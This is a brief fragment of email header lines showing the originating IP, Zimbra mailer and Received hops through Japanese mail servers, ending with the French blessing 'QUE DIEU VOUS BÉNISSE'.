NOTE : X-Originating-Ip : [::ffff:41.86.234.171]


NOTE : Mime-Version : 1.0
NOTE : X-Mailer : Zimbra Mailer (ZimbraWebClient - GC50 (Win)/0.0)
NOTE : Received : from mta02.eonet.ne.jp (mta02.eonet.ne.jp. [2001:ce8:0:603::48])
NOTE : Received : from mailmbsb1mc4.mozu.eo.k-opti.ad.jp (mbs07.eonet.ne.jp [60.56.6.205])


NOTE : by mailauthmsa11.mozu.eo.k-opti.ad.jp
NOTE : QUE DIEU VOUS BÉNISSE